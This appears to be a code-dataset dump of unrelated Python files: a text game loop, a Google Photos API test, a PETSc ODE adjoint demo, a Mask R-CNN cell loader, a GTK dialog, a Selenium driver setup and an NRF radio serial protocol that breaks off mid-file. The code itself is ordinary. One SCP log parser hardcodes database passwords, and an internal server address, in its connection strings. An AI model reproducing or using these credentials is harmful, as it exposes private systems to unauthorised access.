(cf.needsInput()):\r\n enemy = analysisPhase(playerchar) \r\n combat = cf.create(\"fight\", [playerchar, enemy])\r\n wonCombat, playerchar = cf.getNextCommand().execute()\r\n if (not wonCombat): \r\n texty.showPlayer(\"You lose! Play again?\")\r\n playerchar = Player.Player(\"Player\", \"test\")\r\n else:\r\n texty.showPlayer(\"You win! Save and quit?\")\r\n read = texty.readOneKeyFromConsole()\r\n if (read == \"y\"):\r\n texty.showPlayer(\"(J)son or (P)ickle?\")\r\n read = texty.readOneKeyFromPlayer() \r\n if (read == \"j\"):\r\n savvy.saveJson(playerchar)\r\n texty.showPlayer(\"Saved.\")\r\n elif (read == \"p\"):\r\n savvy.savePickle(playerchar)\r\n texty.showPlayer(\"Saved.\")\r\n else:\r\n texty.showPlayer(\"Not a valid option, defaulting to pickle\") \r\n savvy.savePickle(playerchar)\r\n texty.showPlayer(\"Saved.\")","sub_path":"Test/Game/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"43392200","text":"import unittest\nimport sys\nfrom sqlalchemy import false\n\n# pip3 install google-api-python-client-py3\n\n\nfrom unittest import TestCase\n\nclass test_google_photo(TestCase):\n\n def setUp(self):\n pass\n\n def tearDown(self):\n pass\n\n\n def test_getPeoples(self):\n from os.path import join, dirname\n\n from googleapiclient.discovery import build\n from httplib2 import Http\n from oauth2client import file, client, tools\n SCOPES = 'https://www.googleapis.com/auth/photoslibrary.readonly'\n\n store = file.Storage(join(dirname(__file__), 'token-for-google.json'))\n creds = store.get()\n if not creds or creds.invalid:\n flow = client.flow_from_clientsecrets(join(dirname(__file__), 'client_id.json', SCOPES))\n creds = tools.run_flow(flow, store)\n google_photos = build('photoslibrary', 'v1', http=creds.authorize(Http()))\n\n day, month, year = ('0', '6', '2019') # Day or month may be 0 => full month resp. year\n date_filter = [{\"day\": day, \"month\": month, \"year\": year}] # No leading zeroes for day an month!\n nextpagetoken = 'Dummy'\n while nextpagetoken != '':\n nextpagetoken = '' if nextpagetoken == 'Dummy' else nextpagetoken\n results = google_photos.mediaItems().search(\n body={\"filters\": {\"dateFilter\": {\"dates\": [{\"day\": day, \"month\": month, \"year\": year}]}},\n \"pageSize\": 10, \"pageToken\": nextpagetoken}).execute()\n # The default number of media items to return at a time is 25. The maximum pageSize is 100.\n items = results.get('mediaItems', [])\n nextpagetoken = results.get('nextPageToken', '')\n for item in items:\n print(f\"{item['filename']} {item['mimeType']} '{item.get('description', '- -')}'\"\n f\" {item['mediaMetadata']['creationTime']}\\nURL: {item['productUrl']}\")\n\n\n\n def test_list_albums(self):\n #from __future__ import print_function\n from apiclient.discovery import build\n from httplib2 import Http\n from oauth2client import file, client, tools\n\n # Setup the Photo v1 API\n SCOPES = 'https://www.googleapis.com/auth/photoslibrary.readonly'\n\n # see https://console.cloud.google.com/apis/credentials?pli=1 to generate credentials.json file\n store = file.Storage('credentials.json')\n print(store)\n creds = store.get()\n if not creds or creds.invalid:\n flow = client.flow_from_clientsecrets('credentials.json', SCOPES)\n # flow = client.flow_from_clientsecrets('client_secret.json', SCOPES)\n creds = tools.run_flow(flow, store)\n service = build('photoslibrary', 'v1', http=creds.authorize(Http()))\n\n # Call the Photo v1 API\n results = service.albums().list(\n pageSize=10, fields=\"nextPageToken,albums(id,title)\").execute()\n items = results.get('albums', [])\n if not items:\n print('No albums found.')\n else:\n print('Albums:')\n for item in items:\n print('{0} ({1})'.format(item['title'].encode('utf8'), item['id']))","sub_path":"tests/test_google_api/test_google_photo.py","file_name":"test_google_photo.py","file_ext":"py","file_size_in_byte":3195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"109758512","text":"# Testing TSAdjoint and matrix-free Jacobian\n\nimport sys, petsc4py\npetsc4py.init(sys.argv)\n\nfrom petsc4py import PETSc\n\nclass VDP(object):\n n = 2\n comm = PETSc.COMM_SELF\n def __init__(self, mu_=1.0e3,mf_=False):\n self.mu_ = mu_\n self.mf_ = mf_\n if self.mf_:\n self.J_ = PETSc.Mat().createDense([self.n,self.n], comm=self.comm)\n self.J_.setUp()\n self.Jp_ = PETSc.Mat().createDense([self.n,1], comm=self.comm)\n self.Jp_.setUp()\n def initialCondition(self, u):\n mu = self.mu_\n u[0] = 2.0\n u[1] = -2.0/3.0 + 10.0/(81.0*mu) - 292.0/(2187.0*mu*mu)\n u.assemble()\n def evalFunction(self, ts, t, u, f):\n mu = self.mu_\n f[0] = u[1]\n f[1] = mu*((1.-u[0]*u[0])*u[1]-u[0])\n f.assemble()\n def evalJacobian(self, ts, t, u, A, B):\n if not self.mf_:\n J = A\n else :\n J = self.J_\n mu = self.mu_\n J[0,0] = 0\n J[1,0] = -mu*(2.0*u[1]*u[0]+1.)\n J[0,1] = 1.0\n J[1,1] = mu*(1.0-u[0]*u[0])\n J.assemble()\n if A != B: B.assemble()\n return True # same nonzero pattern\n def evalJacobianP(self, ts, t, u, C):\n if not self.mf_:\n Jp = C\n else:\n Jp = self.Jp_\n Jp[0,0] = 0\n Jp[1,0] = (1.-u[0]*u[0])*u[1]-u[0]\n Jp.assemble()\n return True\n def evalIFunction(self, ts, t, u, udot, f):\n mu = self.mu_\n f[0] = udot[0]-u[1]\n f[1] = udot[1]-mu*((1.-u[0]*u[0])*u[1]-u[0])\n f.assemble()\n def evalIJacobian(self, ts, t, u, udot, shift, A, B):\n if not self.mf_:\n J = A\n else :\n J = self.J_\n mu = self.mu_\n J[0,0] = shift\n J[1,0] = mu*(2.0*u[1]*u[0]+1.)\n J[0,1] = -1.0\n J[1,1] = shift-mu*(1.0-u[0]*u[0])\n J.assemble()\n if A != B: B.assemble()\n return True # same nonzero pattern\n def evalIJacobianP(self, ts, t, u, udot, shift, C):\n if not self.mf_:\n Jp = C\n else:\n Jp = self.Jp_\n Jp[0,0] = 0\n Jp[1,0] = u[0]-(1.-u[0]*u[0])*u[1]\n Jp.assemble()\n return True\n\nclass JacShell:\n def __init__(self, ode):\n self.ode_ = ode\n def mult(self, A, x, y):\n \"y <- A * x\"\n self.ode_.J_.mult(x,y)\n def multTranspose(self, A, x, y):\n \"y <- A' * x\"\n self.ode_.J_.multTranspose(x, y)\n\nclass JacPShell:\n def __init__(self, ode):\n self.ode_ = ode\n def multTranspose(self, A, x, y):\n \"y <- A' * x\"\n self.ode_.Jp_.multTranspose(x, y)\nOptDB = PETSc.Options()\n\nmu_ = OptDB.getScalar('mu', 1.0e3)\nmf_ = OptDB.getBool('mf', False)\n\nimplicitform_ = OptDB.getBool('implicitform', False)\n\node = VDP(mu_,mf_)\n\nif not mf_:\n J = PETSc.Mat().createDense([ode.n,ode.n], comm=ode.comm)\n J.setUp()\n Jp = PETSc.Mat().createDense([ode.n,1], comm=ode.comm)\n Jp.setUp()\nelse:\n J = PETSc.Mat().create()\n J.setSizes([ode.n,ode.n])\n J.setType('python')\n shell = JacShell(ode)\n J.setPythonContext(shell)\n J.setUp()\n J.assemble()\n Jp = PETSc.Mat().create()\n Jp.setSizes([ode.n,1])\n Jp.setType('python')\n shell = JacPShell(ode)\n Jp.setPythonContext(shell)\n Jp.setUp()\n Jp.assemble()\n\nu = PETSc.Vec().createSeq(ode.n, comm=ode.comm)\nf = u.duplicate()\nadj_u = []\nadj_u.append(PETSc.Vec().createSeq(ode.n, comm=ode.comm))\nadj_u.append(PETSc.Vec().createSeq(ode.n, comm=ode.comm))\nadj_p = []\nadj_p.append(PETSc.Vec().createSeq(1, comm=ode.comm))\nadj_p.append(PETSc.Vec().createSeq(1, comm=ode.comm))\n\nts = PETSc.TS().create(comm=ode.comm)\nts.setProblemType(ts.ProblemType.NONLINEAR)\n\nif implicitform_:\n ts.setType(ts.Type.CN)\n ts.setIFunction(ode.evalIFunction, f)\n ts.setIJacobian(ode.evalIJacobian, J)\n ts.setIJacobianP(ode.evalIJacobianP, Jp)\nelse:\n ts.setType(ts.Type.RK)\n ts.setRHSFunction(ode.evalFunction, f)\n ts.setRHSJacobian(ode.evalJacobian, J)\n ts.setRHSJacobianP(ode.evalJacobianP, Jp)\n\nts.setSaveTrajectory()\nts.setTime(0.0)\nts.setTimeStep(0.001)\nts.setMaxTime(0.5)\nts.setMaxSteps(1000)\nts.setExactFinalTime(PETSc.TS.ExactFinalTime.MATCHSTEP)\n\nts.setFromOptions()\node.initialCondition(u)\nts.solve(u)\n\nadj_u[0][0] = 1\nadj_u[0][1] = 0\nadj_u[0].assemble()\nadj_u[1][0] = 0\nadj_u[1][1] = 1\nadj_u[1].assemble()\nadj_p[0][0] = 0\nadj_p[0].assemble()\nadj_p[1][0] = 0\nadj_p[1].assemble()\n\nts.setCostGradients(adj_u,adj_p)\n\nts.adjointSolve()\n\nadj_u[0].view()\nadj_u[1].view()\nadj_p[0].view()\nadj_p[1].view()\n\ndef compute_derp(du,dp):\n print(du[1]*(-10.0/(81.0*mu_*mu_)+2.0*292.0/(2187.0*mu_*mu_*mu_))+dp[0])\n\ncompute_derp(adj_u[0],adj_p[0])\ncompute_derp(adj_u[1],adj_p[1])\n\ndel ode, J, Jp, u, f, ts, adj_u, adj_p\n","sub_path":"src/binding/petsc4py/demo/ode/vanderpol.py","file_name":"vanderpol.py","file_ext":"py","file_size_in_byte":4759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"285341354","text":"#Mengurutkan data dari kecil kebesar\n\nprint(\"~\"*39)\n\numur_adik = input(\"Umur adik : \")\numur_kakak = input(\"Umur kakak : \")\numur_ayah = input(\"Umur ayah : \")\numur_ibu = input(\"Umur ibu : \")\n\ndata = [umur_adik, umur_kakak, umur_ayah, umur_ibu]\n\n#Fungsi .sort() untuk mengurutkan bilangan kecil ke besar\ndata.sort()\n\nprint(\"Maka urutan umur dari termuda hingga tertua adalah :\",data)","sub_path":"Mengurutkandata.py","file_name":"Mengurutkandata.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"246203105","text":"if __name__ == '__main__':\n import matplotlib\n # Agg backend runs without a display\n matplotlib.use('Agg')\n import matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport sys\nimport json\nimport datetime\nimport numpy as np\nimport skimage.io\nimport cv2\nfrom scipy.ndimage.measurements import label\nROOT_DIR = os.path.abspath(\"../\")\n# Import Mask RCNN\nsys.path.append(ROOT_DIR) # To find local version of the library\nfrom mrcnn.config import Config\nfrom mrcnn import utils\n\nclass CellDataset(utils.Dataset):\n\n def load_trainingcells(self, dataset_dir):\n \"\"\"\n dataset_dir: The directory of training images.\n \"\"\"\n # Add classes. We have one class.\n # Naming the dataset cell, and the class cell\n self.add_class(\"cell\", 1, \"cell\")\n image_ids = next(os.walk(dataset_dir))[2]\n #To suffle the images just to make sure that any bais due to\n #generation does not kick in.\n image_ids = list(set(image_ids))\n\n # Add images\n for image_id in image_ids:\n\n self.add_image(\n \"cell\",\n image_id=image_id,\n path=os.path.join(dataset_dir,image_id))\n\n def load_validationcells(self,dataset_dir):\n #dataset_dir: The directory of validation images.\n self.add_class(\"cell\",1,\"cell\")\n image_ids=next(os.walk(dataset_dir))[2]\n image_ids=list(set(image_ids))\n for image_id in image_ids:\n self.add_image(\"cell\",image_id=image_id,path=os.path.join(dataset_dir,image_id))\n\n def train_validate_split(self,dataset_dir,ratio=0.7):\n #If the validation set needs to be a part of the training data\n #We need to randomly select out of it ,by the ratio=training/validation\n image_ids=next(os.walk(dataset_dir))[2]\n splitratio=int((1-ratio)*len(image_ids))\n train_ids=np.random.choice(image_ids,splitratio)\n for i in range(len(train_ids)):\n train_ids[i]=str(os.path.join(dataset_dir,train_ids[i]))\n #returns the array of images to train\n return train_ids\n\n def train_validate_loadtrain(self,dataset_dir,train_ids):\n self.add_class(\"cell\", 1, \"cell\")\n for image_id in train_ids:\n self.add_image(\"cell\",image_id=image_id,path=image_id)\n\n def train_validate_loadval(self,dataset_dir,train_ids):\n self.add_class(\"cell\",1,\"cell\")\n image_ids=next(os.walk(dataset_dir))[2]\n val_ids=list(set(image_ids)-set(train_ids))\n for image_id in val_ids:\n self.add_image(\"cell\",image_id=image_id,path=image_id)\n\n def load_mask(self, image_id):\n \"\"\"Generate instance masks for an image.\n Returns:\n masks: A bool array of shape [height, width, instance count] with\n one mask per instance.\n class_ids: a 1D array of class IDs of the instance masks.\n \"\"\"\n info = self.image_info[image_id]\n image_name=info['path'].split(\"/\")[-1]\n # Get mask directory from image path\n #mask_dir = os.path.join(os.path.dirname(os.path.dirname(info['path'])), \"masks\")\n mask_dir = '/Mask_RCNN/data/annotated'\n\n #Get the exact full mask for that image\n for f in next(os.walk(mask_dir))[2]:\n if f.endswith(str(image_name)):\n full_mask = cv2.imread(os.path.join(mask_dir, f),0)\n\n #extract indivial masks of cells from the full mask\n lb = label(full_mask)\n\n msks = []\n for key in range(1,lb[1]+1):\n\n x = lb[1]+1\n #print(x)\n #print(key)\n\n\n newim=np.zeros(full_mask.shape)\n for i in range(full_mask.shape[0]):\n for j in range(full_mask.shape[1]):\n if lb[0][i][j]==key:\n newim[i][j]=1\n msks.append(newim)\n #msks=np.astype(np.bool)\n #print (msks)\n\n # Combine these masks of indiviual cells\n mask = np.stack(msks, axis=-1)\n # Return mask, and array of class IDs of each instance. Since we have\n # one class ID, we return an array of ones\n return mask, np.ones([mask.shape[-1]], dtype=np.int32)\n\n def image_reference(self, image_id):\n \"\"\"Return the path of the image.\"\"\"\n info = self.image_info[image_id]\n if info[\"source\"] == \"cell\":\n return info[\"id\"]\n else:\n super(self.__class__, self).image_reference(image_id)\n","sub_path":"mrcnn/deepcell_dataset.py","file_name":"deepcell_dataset.py","file_ext":"py","file_size_in_byte":4450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"340922901","text":"from gi import require_version\nrequire_version( \"Gtk\", \"3.0\" )\nfrom gi.repository import Gtk, Gdk, GdkPixbuf, GLib \n\nclass ColorDialog( Gtk.Dialog ):\n\n def __init__( self, parent ):\n Gtk.Dialog.__init__(self, \"Pick a Color\", parent, 0, \n (Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL, \n Gtk.STOCK_OK, Gtk.ResponseType.OK))\n self.set_default_size( 150, 100 )\n\n box = self.get_content_area()\n box.set_border_width( 10 )\n self.colorchooser = Gtk.ColorChooserWidget(show_editor=True)\n self.colorchooser.set_use_alpha( False )\n box.add( self.colorchooser )\n self.show_all()\n","sub_path":"src/gui/colorpicker.py","file_name":"colorpicker.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"503805140","text":"'''\n'''\n\nfrom __future__ import division\nimport pypyodbc as odb\nimport pandas.io.sql as psql\nimport re, sys, os, time\nimport numpy as np\nimport pandas as pd\nimport sklearn as sk\nfrom datetime import datetime\nfrom datetime import timedelta\nimport json\nfrom sqlalchemy import create_engine\n\n\nengine = create_engine(\"mssql+pypyodbc://odin:odin168!@10.132.44.78:3000/ODIN?driver=SQL Server\")\npg_engine = create_engine('postgresql://postgres:1Bxpia2a456789@localhost:5432/scm')\n\n\ndef read_scp_folder_today(path, date_delta):\n\tfile_list = list(os.listdir(path))\n\t#for i in range(len(file_list)):\n\t#\tfile_list[i]= file_list[i]\n\tfile_list_2= list(range(len(file_list)))\n\tfor i in range(1,len(file_list)):\n\t\tfile_list_2[i]= [path+file_list[i], file_list[i].replace('.','-').split('-')[1], file_list[i].replace('.','-').split('-')[2][:6], file_list[i].replace('.','-').split('-')[2][:10]]\n\tdf_files = pd.DataFrame( file_list_2[1:], columns = ['path', 'site', 'update_time', 'time_stamp'])\n\ttime_ref = str(datetime.today().date()-timedelta(date_delta))[2:].replace('-','')\n\tdf_files_2 = df_files.sort_values('update_time',ascending=False)\n\tdf_files_2 = df_files_2[ df_files_2['update_time']==time_ref ]\n\tdf_files_2.index = range(1,len(df_files_2)+1)\n\treturn df_files_2\n\n\ndef read_scp_document_v2(obj1):\n\t'''\n\tinput data : obj1 = path(str) target to file level\n\toutput data : json-like list \n\t'''\n\twith open (obj1,\"r\") as myfile:data=myfile.read().replace('\\n', '').replace('REC|','#wa-REC|')\n\tdata = [ s for s in [ s.split('|') for s in data.split('#wa-') ] ]\n\t#data[0] = data[0][1:]\n\treturn data\n\n\n# Check the data structure\ndef check_size_distribution(obj):\n\t'''\n\tcheck the data length => show df\n\tin-put : scp FB01 (json-like list) ex : read_scp_document_v2(path)\n\tout-put : df with distribution\n\t'''\t\n\ttemp = []\n\tfor i in range(len(obj)):temp += [ len(obj[i]) ] # count the size of each sub-list\n\ttemp = pd.DataFrame({'count':temp}) # json-like to table\n\ttemp = pd.DataFrame({'index':list(temp['count'].value_counts().index),'count':list(temp['count'].value_counts())})\n\treturn temp\n\ndef check_dq(obj):\t\n\t'''\n\tcheck the data length => lf there are some length is not majority => show data\n\tin-put : scp FB01 (json-like list) ex : read_scp_document_v2(path)\n\tout-put : json-like list with singular points\n\t'''\t\n\ttemp = []\n\tfor i in range(len(obj)):temp += [ len(obj[i]) ] # count the size of each sub-list\n\ttemp = pd.DataFrame({'count':temp}) # json-like to table\n\ttemp = pd.DataFrame({'index':list(temp['count'].value_counts().index),'count':list(temp['count'].value_counts())})\n\tsingular=[]\n\tfor i in range(len(temp)): \n\t\tif temp['count'][i] / sum(temp['count']) < 0.05: \n\t\t\tsingular += [ temp['index'][i] ]\n\ttemp = []\n\tfor i in range(len(obj)):\n\t\tfor j in range(len(singular)):\n\t\t\tif len(obj[i])== singular[j]:temp+=[ obj[i] ]\n\treturn temp\n\n\ndef trans_to_table(obj):\n\t'''\n\tGoal : transform from json-like list to read_scp_document_v2(path)\n\tin-put : scp FB01 (json-like list) ex : read_scp_document_v2(path)\n\t-> create table columns with the max_len of list\n\t-> exame the data length and make it the same length to have same table columns\n\t-> use df.loc[i] to add each list into a row\n\t'''\n\tmax_len = check_size_distribution(obj)['index'].max()\n\tmain_column = list(range(max_len))\n\tdf = pd.DataFrame(np.random.randn(0, max_len), columns=main_column)\n\tfor i in range(len(obj)):\n\t\tif len(obj[i]) Config:\n with open(CONFIG_FILE, 'r') as file:\n data = json.loads(file.read())\n return Config(**data)\n\n def __set_driver(self):\n if not self.is_test:\n self.driver = webdriver.Remote(\n command_executor='http://127.0.0.1:4444/wd/hub',\n desired_capabilities=DesiredCapabilities.CHROME)\n else:\n is_find = False\n for driver in self.config.drivers:\n try:\n self.driver = webdriver.Chrome(f'{self.config.base_path}/drivers/{driver}')\n is_find = True\n break\n except WebDriverException:\n continue\n\n assert is_find, 'Driver not found!'\n","sub_path":"core/BaseCore.py","file_name":"BaseCore.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"313007343","text":"import struct\nfrom classes import hardware\nfrom classes import common\n\nclass NRFCommands():\n\tdef __init__(self):\n\t\tself.OPCODE_RX_DATA\t\t\t= 100\n\t\tself.OPCODE_TX_DATA\t\t\t= 101\n\t\tself.OPCODE_SET_ADDRESS \t= 102\n\t\tself.OPCODE_GET_ADDRESS \t= 103\n\t\tself.OPCODE_GET_NODEMAP \t= 104\n\t\tself.OPCODE_ADD_NODE_INDEX \t= 105\n\t\tself.OPCODE_DEL_NODE_INDEX \t= 106\n\t\tself.OPCODE_GET_NODE_INFO \t= 107\n\t\tself.OPCODE_GET_NODES_MAP \t= 108\n\t\tself.OPCODE_GET_NODES_LIST\t= 109\n\t\tself.OPCODE_SET_NODES_DATA\t= 110\n\t\tself.OPCODE_GET_NODES_DATA\t= 111\n\t\n\t'''\n\t{UART PACKET}\n\t-------------\n\t[MAGIC_NUMBER] \t\t(2 Bytes)\n\t[Direction] \t\t(1 Byte)\n\t[Opcode]\t\t\t(1 Byte)\n\t[Content Length] \t(1 Byte)\n\t[Payload]\t\t\t(57 Bytes)\n\t[MAGIC_NUMBER] \t\t(2 Bytes)\n\n\t{NRF PACKET}\n\t------------\n\t[NodeID] \t\t\t(1 Byte)\n\t[Opcode] \t\t\t(1 Byte)\n\t[Size] \t\t\t\t(1 Byte)\n\t[Payload]\t\t\t(12 Bytes)\n\t[CRC] \t\t\t\t(1 Byte)\n\t'''\n\n\tdef SetNodeDataCommand(self, index, data):\n\t\treturn struct.pack(\"BBBBBIBB\", 0xDE, 0xAD, 0x1, self.OPCODE_SET_NODES_DATA, index, data, 0xAD, 0xDE)\n\t\n\tdef GetNodeDataCommand(self, index):\n\t\treturn struct.pack(\"BBBBBBB\", 0xDE, 0xAD, 0x1, self.OPCODE_GET_NODES_DATA, index, 0xAD, 0xDE)\n\t\n\tdef GetNodeListCommand(self):\n\t\treturn struct.pack(\"BBBBBB\", 0xDE, 0xAD, 0x1, self.OPCODE_GET_NODES_LIST, 0xAD, 0xDE)\n\t\n\tdef ReadRemoteCommand(self, node_id, msg):\n\t\ts_msg = ''.join(chr(x) for x in msg)\n\t\t# \t\t\t\t\t\t\t\t\t\t\t\t\t [MN] [DIR] [OP] [LEN] [ID] [OP] [LEN] [P] [MN]\n\t\treturn struct.pack(\"BBBBBB{0}sBB\".format(len(msg)), 0xDE, 0xAD, 0x1, self.OPCODE_RX_DATA, 1, node_id, s_msg.encode(), 0xAD, 0xDE)\n\t\n\tdef WriteRemoteCommand(self, node_id):\n\t\treturn struct.pack(\"BBBBBBBB\", 0xDE, 0xAD, 0x1, self.OPCODE_TX_DATA, 1, node_id, 0xAD, 0xDE)\n\n\tdef GetNodeMapCommand(self):\n\t\treturn struct.pack(\"BBBBBB\", 0xDE, 0xAD, 0x1, self.OPCODE_GET_NODEMAP, 0xAD, 0xDE)\n\t\n\tdef AddNodeIndexCommand(self, index):\n\t\treturn struct.pack(\"BBBBBBBB\", 0xDE, 0xAD, 0x1, self.OPCODE_ADD_NODE_INDEX, 1, index, 0xAD, 0xDE)\n\t\n\tdef DelNodeIndexCommand(self, index):\n\t\treturn struct.pack(\"BBBBBBBB\", 0xDE, 0xAD, 0x1, self.OPCODE_DEL_NODE_INDEX, 1, index, 0xAD, 0xDE)\n\n\tdef SetAddressCommand(self, address):\n\t\treturn struct.pack(\"BBBBBBBB\", 0xDE, 0xAD, 0x1, self.OPCODE_SET_ADDRESS, 1, address, 0xAD, 0xDE)\n\t\n\tdef GetAddressCommand(self):\n\t\treturn struct.pack(\"BBBBBB\", 0xDE, 0xAD, 0x1, self.OPCODE_GET_ADDRESS, 0xAD, 0xDE)\n\t\n\tdef GetNodeInfoCommand(self):\n\t\treturn struct.pack(\"BBBBBB\", 0xDE, 0xAD, 0x1, self.OPCODE_GET_NODE_INFO, 0xAD, 0xDE)\n\t\n\tdef GetNodesMapCommand(self):\n\t\treturn struct.pack(\"BBBBBB\", 0xDE, 0xAD, 0x1, self.OPCODE_GET_NODES_MAP, 0xAD, 0xDE)\n\nclass NRF(hardware.HardwareLayer):\n\tdef __init__(self):\n\t\thardware.HardwareLayer.__init__(self)\n\t\tself.Commands = NRFCommands()\n\n\t\tself.NodeTypeMap = {\n\t\t\t0x2: \"GATEWAY\",\n\t\t\t0x3: \"NODE\"\n\t\t}\n\t\n\tdef GetDeviceType(self, port):\n\t\tdev_type = self.HW.GetDeviceType(port)\n\t\treturn {\n\t\t\t'device_type': dev_type\n\t\t}\n\t\n\tdef GetDeviceAdditional(self, port):\n\t\tadditional = self.HW.GetDeviceAdditional(port)\n\t\tif (len(additional) > 1):\n\t\t\treturn {\n\t\t\t\t'type': self.NodeTypeMap[additional[0]],\n\t\t\t\t'index': additional[1]\n\t\t\t}\n\t\treturn None\n\t\n\tdef SetNodeAddress(self, port, address):\n\t\tpacket = self.Commands.SetAddressCommand(address)\n\t\tpacket = self.HW.Send(port, packet)\n\n\t\tif packet is None:\n\t\t\treturn None\n\n\t\tif len(packet) > 3:\n\t\t\tif packet[1] == self.Commands.OPCODE_SET_ADDRESS:\n\t\t\t\treturn {\n\t\t\t\t\t'index': packet[3]\n\t\t\t\t}\n\t\t\telse:\n\t\t\t\tprint(\"(ERROR) Return OPCODE is incorrect.\")\n\t\t\t\treturn None\n\t\telse:\n\t\t\tprint(\"(ERROR) Return packet is less then expected.\")\n\t\t\treturn None\n\t\n\tdef GetNodeAddress(self, port):\n\t\tpacket = self.Commands.GetAddressCommand()\n\t\tpacket = self.HW.Send(port, packet)\n\n\t\tif packet is None:\n\t\t\treturn None\n\t\t\n\t\tif len(packet) > 3:\n\t\t\tif packet[1] == self.Commands.OPCODE_GET_ADDRESS:\n\t\t\t\treturn {\n\t\t\t\t\t'index': packet[3]\n\t\t\t\t}\n\t\t\telse:\n\t\t\t\tprint(\"(ERROR) Return OPCODE is incorrect.\")\n\t\t\t\treturn None\n\t\telse:\n\t\t\tprint(\"(ERROR) Return packet is less then expected.\")\n\t\t\treturn None\n\t\n\tdef GetNodeInfo(self, port):\n\t\tpacket = self.Commands.GetNodeInfoCommand()\n\t\tinfo = self.HW.Send(port, packet)\n\n\t\tif info is None:\n\t\t\treturn None\n\t\t\n\t\tif len(info) > 3:\n\t\t\tif info[1] == self.Commands.OPCODE_GET_NODE_INFO:\n\t\t\t\treturn {\n\t\t\t\t\t'info': info\n\t\t\t\t}\n\t\t\telse:\n\t\t\t\tprint(\"(ERROR) Return OPCODE is incorrect.\")\n\t\t\t\treturn None\n\t\telse:\n\t\t\tprint(\"(ERROR) Return packet is less then expected.\")\n\t\t\treturn None\n\t\n\tdef GetNodeList(self, port):\n\t\tpacket = self.Commands.GetNodeListCommand()\n\t\tpacket = self.HW.Send(port, packet)\n\n\t\tif packet is None:\n\t\t\treturn None\n\t\t\n\t\tif len(packet) > 0:\n\t\t\tif packet[1] == self.Commands.OPCODE_GET_NODES_LIST:\n\t\t\t\tinfo = {\n\t\t\t\t\t'list': []\n\t\t\t\t}\n\t\t\t\tdata = packet[3:]\n\t\t\t\tfor idx, item in enumerate(data[::2]):\n\t\t\t\t\tnode = data[idx*2:idx*2+2]\n\t\t\t\t\tinfo[\"list\"].append({\n\t\t\t\t\t\t\"device_id\": node[0],\n\t\t\t\t\t\t\"status\": node[1]\n\t\t\t\t\t})\n\t\t\t\treturn info\n\t\t\telse:\n\t\t\t\tprint(\"(ERROR) Return OPCODE is incorrect.\")\n\t\t\t\treturn None\n\t\telse:\n\t\t\tprint(\"(ERROR) Return packet is less then expected.\")\n\t\t\treturn None\n\t\n\tdef GetNodesMap(self, port):\n\t\tpacket = self.Commands.GetNodesMapCommand()\n\t\tmap = self.HW.Send(port, packet)\n\n\t\tif map is None:\n\t\t\treturn None\n\t\t\n\t\tif len(map) > 3:\n\t\t\tif map[1] == self.Commands.OPCODE_GET_NODES_MAP:\n\t\t\t\treturn {\n\t\t\t\t\t'info': map\n\t\t\t\t}\n\t\t\telse:\n\t\t\t\tprint(\"(ERROR) Return OPCODE is incorrect.\")\n\t\t\t\treturn None\n\t\telse:\n\t\t\tprint(\"(ERROR) Return packet is less then expected.\")\n\t\t\treturn None\n\t\n\tdef AddNodeIndex(self, port, index):\n\t\tpacket = self.Commands.AddNodeIndexCommand(index)\n\t\tpacket = self.HW.Send(port, packet)\n\n\t\tif packet is None:\n\t\t\treturn None\n\n\t\tif len(packet) > 3:\n\t\t\tif packet[1] == self.Commands.OPCODE_ADD_NODE_INDEX:\n\t\t\t\tupdated_index = packet[3]\n\t\t\t\tstatus = False\n\t\t\t\tif index == updated_index:\n\t\t\t\t\tstatus = True\n\t\t\t\treturn {\n\t\t\t\t\t'status': status,\n\t\t\t\t\t'info': packet\n\t\t\t\t}\n\t\t\telse:\n\t\t\t\tprint(\"(ERROR) Return OPCODE is incorrect.\")\n\t\t\t\treturn None\n\t\telse:\n\t\t\tprint(\"(ERROR) Return packet is less then expected.\")\n\t\t\treturn None\n\t\n\tdef DelNodeIndex(self, port, index):\n\t\tpacket = self.Commands.DelNodeIndexCommand(index)\n\t\tpacket = self.HW.Send(port, packet)\n\n\t\tif packet is None:\n\t\t\treturn None\n\n\t\tif len(packet) > 3:\n\t\t\tif packet[1] == self.Commands.OPCODE_DEL_NODE_INDEX:\n\t\t\t\tupdated_index = packet[3]\n\t\t\t\tstatus = False\n\t\t\t\tif index == updated_index:\n\t\t\t\t\tstatus = True\n\t\t\t\treturn {\n\t\t\t\t\t'status': status,\n\t\t\t\t\t'device_id': updated_index\n\t\t\t\t}\n\t\t\telse:\n\t\t\t\tprint(\"(ERROR) Return OPCODE is incorrect.\")\n\t\t\t\treturn None\n\t\telse:\n\t\t\tprint(\"(ERROR) Return packet is less then expected.\")\n\t\t\treturn None\n\t\n\tdef GetRemoteNodeInfo(self, port, index):\n\t\tpayload = [self.Commands.OPCODE_GET_NODE_INFO, 0]\n\t\tpacket = self.Commands.ReadRemoteCommand(index, payload)\n\t\tpacket = self.HW.Send(port, packet)\n\n\t\tif packet is None:\n\t\t\treturn None\n\t\t\n\t\tif len(packet) > 0:\n\t\t\tif packet[1] == self.Commands.OPCODE_RX_DATA:\n\t\t\t\tif len(packet) > 18:\n\t\t\t\t\tif packet[4] == self.Commands.OPCODE_GET_NODE_INFO:\n\t\t\t\t\t\tnrf_packet = packet[3:]\n\t\t\t\t\t\treturn {\n\t\t\t\t\t\t\t'packet': nrf_packet\n\t\t\t\t\t\t}\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint(\"(ERROR) Incorrect answer. {0}\".format(packet))\n\t\t\t\t\t\treturn None\n\t\t\t\telse:\n\t\t\t\t\tprint(\"(ERROR) Packet length incorrect.\")\n\t\t\t\t\treturn None\n\t\t\telse:\n\t\t\t\tprint(\"(ERROR) Return OPCODE is 